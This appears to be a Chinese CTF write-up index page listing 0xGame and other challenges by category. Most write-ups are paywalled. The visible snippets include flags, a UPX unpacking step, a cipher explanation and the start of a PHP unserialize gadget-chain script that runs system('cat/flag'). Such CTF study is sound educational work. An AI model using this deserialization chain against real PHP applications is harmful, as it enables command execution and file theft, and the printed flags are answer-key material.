-
unserialize
1.构造脚本<?phpclassentrance{public$start;}classspringboard{public$middle;}classevil{public$end='system("cat/flag");';}$evil=newevil;$springboard=newspringboard;$springboard->middle=$evil;$entrance=...
- WEB
- 10月前
-
week1_re1
IDA打开得到flag0xGame{be9d9fee-7d45-4a3e-a105-802b3221665d}
- Reverse
- 10月前
-
py一下
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 10月前
-
壳
IDA直接打开后发现没有注释结合题目壳,疑似进行了加壳。使用PEiD打开确实有加壳,使用了upx加壳使用upx-d进行脱壳再用ida打开得到flag0xgame{up3_is_a_basic_ke}
- Reverse
- 10月前
-
签到-0xgame2020
IDA打开后找到flag0xgame{w3lcom3_20_oXCtf!}
- Reverse
- 10月前
-
Fermat_with_Binomial
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Crypto
- 10月前
-
pychon
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 10月前
-
公平竞争
图中就是密钥了0xGame{xxxxxxxxxxxx}就是明文3uMgkggklyjs47xg0mx3就是密文加密方法:1、将明文两两分组例:明文0xgame11234分组1:明文个数为偶数个例:明文0xgame1234分组后为0xgame1234分组2:明文个数为奇数个分组1用到最后还多一个咋办?缺补:在最后一个明文字母的后面补上其下一位字母例:明文0xgame12345分组后为0xgame12...
- Crypto
- 10月前
-
linearEquation
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 10月前
-
InterKosenCTF-2019-E_S_P
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Crypto
- 10月前
-
签个名吧
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- Crypto
- 10月前
-
Euler
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 10月前
-
Divide_and_Conquer
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Crypto
- 10月前
-
[HackINI-2023] [Crypto] BaSeS
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 10月前
-
errorShell
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 10月前
-
RSA大闯关
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- Crypto
- 10月前
-
flask真香
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- WEB
- 10月前
-
blocker
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 10月前
-
MTP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Crypto
- 10月前
-
1-Beijing
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Reverse
- 10月前